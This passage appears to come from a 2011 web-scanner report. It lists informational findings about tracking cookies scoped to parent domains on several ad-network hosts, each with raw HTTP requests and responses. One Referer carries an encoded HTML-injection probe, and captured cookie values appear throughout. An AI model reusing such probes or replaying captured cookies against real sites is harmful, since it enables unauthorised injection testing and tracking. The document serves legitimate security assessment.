bkc=KJh5Na2/DtWD9wOpljjrmFIDsexjxjj1EH1CIQmvIsxyWVFiQ0jJ6TobpYxBB4PkaVuu6COf3wVxNSGa3xIOWAiwFHQa2jnoCYcmLFhe6Mkl458fpL1t4+hpFr2X8lTfdSA9bd1SksqANsQ96/2KEmSryRdjMPqe5Q49N9MlIEfr0C8rIkDmj9/1tjn9Xph+hNSLhtpSE27+OsQT3WamfonU9Cwe8BQCRvjT8VWnxe3rPTutxuH95QQ457wdq9UZPKsTXwDElY7YbXK8PTHdY9XK8qTgEm5EULaIlLql25oFNd+e+3yOzt63BIDgw66cvc0Zx5MAUNjrik5ry4fV8VFxPZSFuR/blqUYavXXQdrkpx9WM0U00KVolOuFfWyet1fDGvFWXJ25lOuFw/f8AxMKi2DNfW4Osw7A9e4avdLhvjuajyC+K0Z4daiRToU4Rv6IryRExzBHFs2ZDfpjKTeqRFvZcVO0DT1c6NLf4iFzmX52E4iizc9mZsXv7hfQgCnmbrYm+7YcCnrap8pk5rlkUrpZeFr83UdvfdO2oKO2KPC+rvrJZIvPmfsdtlQdjGrlF9bTGgr+cjQnM7OfC/+zlnuIt4EIpc8N9I+sVIY0fiKrhwTVSB/5WG8l9cmLCjFbhj8MFpGgM41PRftwvgSXuj91sKialpQMvCnw0S4vrvkIjz3wRelPJxkltl9KBK9ShRSqg50BJrBPCl/XfIfGC+zewCr8lZaTWI5e6tzBL+cNXWDMByMf1B8LVkIjNFw2U0X4RFoI2ah8YKKJnbEOIF/s7+I+Kp/9pOuFw/BaCd4CUWcgXyVdUQCEFwn4j/9X7m5P4L1cCYkKtRSN4CQcI/MpHwZ2zBzG20UClielb9MldclrCucrgXv4CcwFzVzJmTV+yotela4Fz14frWrprSk40idHL2wTcpx8vnydM8F0kE6TfywBsLEiCiITraravPd8ccbBlxnTFgvs20BCK3bzQFw7sXfeyrPWwnZl7q+cZwvPdyW9yipA; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjZA4ReuMvy1rxkhZKZ0e9RsHQSsoQSZCoSsoAqVJQjsH3jZx9Jx6+eYymRRCSQRZnD9QYrThu8

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:46:46 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e2ad0c6; expires=Mon, 25-Jul-2011 13:46:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=Mu2wa33Jr4td8JkA; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NWN/PaWDOdedztqusq2nea/A0JJH66u/wA9HPyRMRGtT6YHo+vvVZSuCjZbZQAhus3xVBut0LoGQShWGAqugMPaxZXywsWx+0yIupo7op7F7nrRBwIb8288ff7+7h9VWxLYfed7POG9HXrWIbxSfburJym36QjnDpJC7TbVgbVzNpN5t673FCbHw2AoU5WFpFf/deHCyh1c2mYkZmIPMBKI77J11NmXtAJA2ffaCqJ95lQBCMkzK+9Wo+aTCtRsx7IluFe5cIZznCJzNntZIKWQbx4w3xKkapEX62IIUF3sjpbKXuwVXHF4NlmK1N/5+VTayES/6pN5IZ9/Dwe/ySFWFrpEcvp5E4VFpenuVm3FMDO+hMVSmP8bQdj/ZQ1YObchtVS/6h0L7JysqSxRbi6ldtunBXzGIKQEEvS4QoA48FZSmPl8OKlr5OLRYor4GdqsSTblKOZZqhK+mTBVbQ5FMspsdNBypJUNOXt7BQuA/U2jX+WIbD7BbrdHzLlHxz84ZRXKkLfjnpljJMd3ArUfvqICIWIMIfNSjfZ0D87Mke3gFJ+lljBsshTPpWqKtxECd7fHqztsVBv2FB5I4NzXrD58AsX8sdY9grgXBMHWcBuINxpMzn1lNWrBDgTTvXlhakmI2XQNwcmvHuof8E52XKUuz4SHDZFBU8FAC03K3mmGrOdVUKk3M0cuEUqgOR7gPDDq7lE3l87cebteUrD0F6d4KIBk9OgAmUyhtFVRFhPFBb0FpK+fdbIDCcBZwh8U73E2TQyjVa2qGdeAHFdJeZmmPJ0Mo6HlDJXiH4AswJ8G8UFkFwJOndq7ujl3UjG8U5kYrf6K9MXLg1qdPleAL4DjpE6ObKWCbIoq6p/e6PXt4Bs44kWfU7vpjggZMUdgX5KZkUrZuesZrkdJEXrxT4R1VOpEFpJUZIzorb+dIJQwCJ5m7L3HqBwBX8Hw6rc1PInbTxr2cNe0r7We28hFNyTvaSe0fo6tbVpwwPdTcysLo+9==; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101E8txzLwv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYuvCkf; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJha6nNnxkWROFe75/w6sAs6a/JeQPYutBqcoW+O/Rg6eNhYzsLgin9wtGwQOrWDtvg5CYM3lfiMATjextoemWEFXhbC8UKTfdmK288ptiA9qQOUkAwDNQYe3w+bY0EVoRxsgQtxh+/VANjLEZ3j7Blp/zLIf74d26p+usAbyBLWA1EfBCw4bjKOsI7vZxe4mi6FUTLTiuN7/vbGS5alrCF6udNH/8F9vagNSal+KKpd2eYKfELe5PCZm7F1+vXI7Zo7aUvIfOA2rsHwbRoKCwxrjWX2qLxc2u7mDbXZMvuPAObo80cgqG4m5aC8c+WULq/7BTXWbe799gJ8l+0KoPuyuU1uZ15FyuSzBHy7uUZ+aaoaINgXfhdE4al/; expires=Thu, 19-Jan-2012 13:46:46 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sun, 24-Jul-2011 13:46:46 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Sun, 24 Jul 2011 13:46:46 GMT
Cache-Control: max-age=86400, private
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.164. http://tags.bluekai.com/site/2751 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2751

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=06DM01V5c/WBvF/1; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
bkc=KJpqpXU9ycZ/QuWbDXmwiRsOREIx46GUkHdeQrenXE/yHvQ013pUNFOMCwn43esQXWc3R4h449y1LEzjsV3xIOaGdaYQczCXAcTR7h1G+lzb961oWMIksjUFt/evO2Wyw+OoecSNWeTEkOdsCzGwHKmef94hZRaL9/Vgv1T=; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrRhZHoIn9h0F9y1w9psWKVZ9P7ooijkVq7g+EUX9OtdYfX=; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2751?id=AA-00000001931708427 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bklc=4e282b73; bk=JnBCQXV5c/WBvF/1; bkc=KJ0ETtPQiaOkjaiFgKcc01e9/94AFNaMxmccLYeTFdQRssJF1MnD/wWM6wiCU9yG4JOIsJXEvn5lmQBevH/doHZPf2i90Q4H1efxSxht+H9IW8x4hGUve6UMQIycXjZOq9etqiY5; bkdc=res; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101PbFgKWc9WR0OjL=; bkst=KJhMRjeMjVeQREYmvezB0WGlBu7n0ktFgKWc9e/eOjG=

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:00 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=06DM01V5c/WBvF/1; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpqpXU9ycZ/QuWbDXmwiRsOREIx46GUkHdeQrenXE/yHvQ013pUNFOMCwn43esQXWc3R4h449y1LEzjsV3xIOaGdaYQczCXAcTR7h1G+lzb961oWMIksjUFt/evO2Wyw+OoecSNWeTEkOdsCzGwHKmef94hZRaL9/Vgv1T=; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrRhZHoIn9h0F9y1w9psWKVZ9P7ooijkVq7g+EUX9OtdYfX=; expires=Tue, 17-Jan-2012 18:01:00 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 22-Jul-2011 18:01:00 GMT; path=/; domain=.bluekai.com
BK-Server: 1ae0
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.165. http://tags.bluekai.com/site/365 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/365

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=R4SalLV5c/WBvF/1; expires=Tue, 17-Jan-2012 18:01:12 GMT; path=/; domain=.bluekai.com
bkc=KJpnjVHQRs8QR1M/Nw9e1Ck0QDx1YTvd7TrOQ41x9616WFIDniG4oOfskIBkR/CxjVHRgTlQFNaMxmseN1wTFdQRssJF1MnD/wWM6wiCxerxIue21eT7DsfF59SsDiHIuM13lfWOkxIiRU0Q6hMLSiaXJiQdM9rPcTgsO2AwTM1etxYGii6S; expires=Tue, 17-Jan-2012 18:01:12 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/365 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bklc=4e282b73; bk=W4nOEXV5c/WBvF/1; bkc=KJpqpXU9ycZ/QuWbDXmwARsOREIx46GUkHdeQrenXE/yHvQ013pUHFe43esQXWc3R4h449y1LEzjsV3xIOaGdaYQczCXAcTR7h1G+lzb961oWMIksjUFt/evO2Wyw+OoecSNWeTEkOdsCzGwHKmef94hZRaL9/v4v1L=; bkdc=res; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101PbFgKWc9WR0OjL=; bkst=KJhMR5Mwhz9QyreG3sL99RSVhGqZOCRZHrqHZHoIn9h0F9y1w9psWKVZ9P7ooijkVq7g+EUX9OtMYfT=

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 18:01:12 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 22 Jul 2011 18:01:12 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=R4SalLV5c/WBvF/1; expires=Tue, 17-Jan-2012 18:01:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpnjVHQRs8QR1M/Nw9e1Ck0QDx1YTvd7TrOQ41x9616WFIDniG4oOfskIBkR/CxjVHRgTlQFNaMxmseN1wTFdQRssJF1MnD/wWM6wiCxerxIue21eT7DsfF59SsDiHIuM13lfWOkxIiRU0Q6hMLSiaXJiQdM9rPcTgsO2AwTM1etxYGii6S; expires=Tue, 17-Jan-2012 18:01:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 22-Jul-2011 18:01:12 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

10.166. http://uat.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uat.netmng.com
Path:	/pixel/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

evo5=csmq4atf04cxa%7CIn4F0BaOvaSAfbAB87TKJGnnyYb0mL3oKgeFrwk7WLLSNJjmSFe3wmJCAYNWqS6SNECrpaPuXV%2Bup99Jtkwx7QFt5OHNaJ%2F0ZiaeEJZDsokWcJfPcwOJ0mSk1OnsbgzjSoJS5DJXSIb3xkyoob04Gw1%2B%2BOQxODX8iYg8fJRDMZ8gd0G34z3Ug6l5NESHBTI4Rw2f9XzBy5yK08dq%2F1TbmclPdNYl5bm7%2FWeHXVCOxIpFjgRwTqfCpQICJHp2RtzJQIj1X%2BpbuBCWT4fhCheYiuJddspGbTT5Hw0nFrekmMzhqK2wFMO8nd1CfJbOYmiidLwkNFzXIafE3J8m9C03QLnEy1GU8rOM226GmVUFMnOl2mrg1JzjDIHSjgTKF9qnCs07my410DDuZ%2F4r2nBhk%2Brbq1Jxjp3hALbn6ep60kKSuRsUMcxuvkKYXnYthYKX6b9G3yNUg%2Fcv5tZ5ePFUtSXqx0hatSxRmUNnBcAOHbJxRHn9gumDP56ULZa2A%2FiaEpGOCamEhVBr7314xLR7HR9oz%2BT2KgEQRR3D1y%2BIb5ne4n6I3OKK2vTIGOI%2B4wyjRBW6B5AX8cAfj3gV%2FS%2B2zqS5vxpVr%2FZitxx%2FqQMPVQYIFi8RVbmF%2FWpky2f0zZu2ChLyH4gMkAubOjXV%2FKOn2ag5%2FVKXaj3dp9ig2SUsb7B22Zk%2Br9fHJfTSWZnHAlc9ZtR0dCizD0KUCIqJbMwgx4klXkGql%2Btf%2Flo%2F1X8IWxsJDTkqh8aSAUMlnyiWsuJoRVPcFfq1O4%2FOILzSEhjNRuskw6dEk%2BeK2VJ4EA6t4tU%3D; expires=Sat, 21-Jan-2012 20:31:11 GMT; path=/; domain=.netmng.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/?aid=1114&tax=ndb HTTP/1.1
Host: uat.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CAQGES0N0um6Q1S50pwdXwaloafecUVa4vjjOVJ4PZ7FRnQU2rZZcWm6UeSvYpuRguAdExY2xVN0h2HMOKle0CdWtBxEzMpnNsAklyNag4pEhRszIZntrnFclsdxNCoOUoS1cZyr7kpevrQiQjetmygoATp3OcX%2FsxZENo%2BJ7YbFso%2FCZePw76fI88JF9z%2BkO12lB%2FEOpDkBAM9hwIIU9KKFtDWqgFYm%2FXaIMSFyeQvTjkBVpnPIyVyIU9%2Fm80OPZv6JPACxxa10U%2FRQ9iKZrp58dPwZVk9fmbeDeMYrkpVwX%2FwM79j0m%2BS5YgdzOf%2B5eeFqOfk%2FhWLY5wI4yjF6mj7Ne41fQn8pKCBhtuUWM0J6ZMnj8FUXsALG3%2BDw4PMs67VbN5vPQ%2FTacdpUHCytSuN7rekuSAmFyVLYJkVX8lw1Fx86OljpJ1YeciJ6eE80hv26Dr%2BuNv4ArquanZWV2dPREW%2F5S86FCvBa94RtE60no3eS6lsK2D4O3VXbxYxHe0z8FJyXvs0bSLoAjqUh5Ob1cXJR4orsyOFFWgMWUKnlRhcJj6mauUt5wmtTDm%2FQZ8RNhYnsoh4M79qzw0i4CF%2BQoIOKtv5vIM5dMeKaHa2nPc%2F0aJi2J6GWJ6%2FsRHk%2BjQziMl4DVqufVmQynf%2Fiqzb4O%2FjVqv8HWBTimQrlLF4cRRf2BN8BsjFrGDWu%2FUivjBrAGYKL2Q5TYpR4xyUgTRQ0SHYiAMa%2BJq7lhWGhtjN6D28WdgcvKOgHh12sVFjmi5sOeYhgnhh9gDShEFsMZMmJWiHecDr5%2FpkxvDDCJyeQ%3D

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:11 GMT
Server: Apache/2.2.9
P3P: policyref="http://uat.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Wed, 20 Jul 2011 20:31:11 GMT
Last-Modified: Wed, 20 Jul 2011 20:31:11 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7CIn4F0BaOvaSAfbAB87TKJGnnyYb0mL3oKgeFrwk7WLLSNJjmSFe3wmJCAYNWqS6SNECrpaPuXV%2Bup99Jtkwx7QFt5OHNaJ%2F0ZiaeEJZDsokWcJfPcwOJ0mSk1OnsbgzjSoJS5DJXSIb3xkyoob04Gw1%2B%2BOQxODX8iYg8fJRDMZ8gd0G34z3Ug6l5NESHBTI4Rw2f9XzBy5yK08dq%2F1TbmclPdNYl5bm7%2FWeHXVCOxIpFjgRwTqfCpQICJHp2RtzJQIj1X%2BpbuBCWT4fhCheYiuJddspGbTT5Hw0nFrekmMzhqK2wFMO8nd1CfJbOYmiidLwkNFzXIafE3J8m9C03QLnEy1GU8rOM226GmVUFMnOl2mrg1JzjDIHSjgTKF9qnCs07my410DDuZ%2F4r2nBhk%2Brbq1Jxjp3hALbn6ep60kKSuRsUMcxuvkKYXnYthYKX6b9G3yNUg%2Fcv5tZ5ePFUtSXqx0hatSxRmUNnBcAOHbJxRHn9gumDP56ULZa2A%2FiaEpGOCamEhVBr7314xLR7HR9oz%2BT2KgEQRR3D1y%2BIb5ne4n6I3OKK2vTIGOI%2B4wyjRBW6B5AX8cAfj3gV%2FS%2B2zqS5vxpVr%2FZitxx%2FqQMPVQYIFi8RVbmF%2FWpky2f0zZu2ChLyH4gMkAubOjXV%2FKOn2ag5%2FVKXaj3dp9ig2SUsb7B22Zk%2Br9fHJfTSWZnHAlc9ZtR0dCizD0KUCIqJbMwgx4klXkGql%2Btf%2Flo%2F1X8IWxsJDTkqh8aSAUMlnyiWsuJoRVPcFfq1O4%2FOILzSEhjNRuskw6dEk%2BeK2VJ4EA6t4tU%3D; expires=Sat, 21-Jan-2012 20:31:11 GMT; path=/; domain=.netmng.com
Content-Length: 36
Connection: close
Content-Type: image/gif

GIF89a.............,...........D..;

10.167. http://user.lucidmedia.com/clicksense/user previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://user.lucidmedia.com
Path:	/clicksense/user

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:42:53 GMT; Path=/
2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:42:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/user?p=a371b4911c4e5b09&r=1 HTTP/1.1
Host: user.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:42:53 GMT
Expires: Thu, 21 Jul 2011 18:42:53 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:42:53 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:42:53 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3449391312096071132
Content-Length: 0
Connection: close

10.168. http://user.lucidmedia.com/clicksense/user/browser previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://user.lucidmedia.com
Path:	/clicksense/user/browser

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:01:14 GMT; Path=/
2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:01:14 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/user/browser?p=01ade0576e83218e&d=433;17637&i=4292bea5-fe46-48cd-938b-a04020fccabc&r=1 HTTP/1.1
Host: user.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:01:14 GMT
Expires: Thu, 21 Jul 2011 18:01:14 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:01:14 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Fri, 20-Jul-2012 18:01:14 GMT; Path=/
Location: http://d.pixel.trafficmp.com/a/bpix?tax_id=31&user_id=3449391312096071132
Content-Length: 0
Connection: close

10.169. http://vap2den1.lijit.com/www/delivery/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vap2den1.lijit.com
Path:	/www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_OABLOCK[785]=1311396715; expires=Mon, 22-Aug-2011 04:51:55 GMT; path=/; domain=.lijit.com
%5FOABLOCK%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
%5FOACAP%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
%5FOASCAP%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
OABLOCK=785.1311396555; expires=Mon, 22-Aug-2011 04:51:55 GMT; path=/; domain=.lijit.com
OACAP=785.1; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
OASCAP=785.1; path=/; domain=.lijit.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=301&bids=785&zoneid=127557&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.curse.com%2F&referer=http%3A%2F%2Fc627028.r28.cf2.rackcdn.com%2Fgoogle29reddefaultsUSA728x90.html&cb=70596e55b6 HTTP/1.1
Host: vap2den1.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D; tpro_inst=b25aa85a3e9390bd4920c9da2e048768; tpro=eJxNUNGOgyAQ%2FJd9Jg2IWvUL7h%2BaC6GISqJgQC9pjP9%2BuzTe9W1nYGZn9oA1hsHNFroDRut7G2laNDH8Ju8MBnuhWp4M9Jj%2FSiUK4rhgIBDcM6gQNEqWWdswkJUq2wxKBhVX67wngkWBTlGbbGX0bohsUaCHqPRyGevktEfAYHJpvdiwTZSSo4WZ3NxH68nGh5wRTV42L5G0xHkTlryGK8mJFpSLqzqDAnPVXAnO3wrMzz9i1rQjzLN9l%2FbB50OUzQeNEGuPUfcqmSmHrE%2FUJbdRjseRJ%2BjgKzyfL8BWG3RCCiHbuqrE%2Bf3XCO%2B%2BOQr7%2F8pgCb0yYfckYvBjY3IB%2B4K4cTjPX8H9e9I%3D; ljt_csync=dotomi%2Crtb_turn%2Crtb_simplifi%2C1

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:51:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1311396715; expires=Mon, 22-Aug-2011 04:51:55 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Fri, 23-Jul-2010 04:51:54 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1311396555; expires=Mon, 22-Aug-2011 04:51:55 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.1; expires=Sun, 22-Jul-2012 04:51:55 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.1; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.170. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://visualstudiogallery.msdn.microsoft.com
Path:	/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 02:01:09 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/ HTTP/1.1
Host: visualstudiogallery.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/events/fs2011/demofest.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
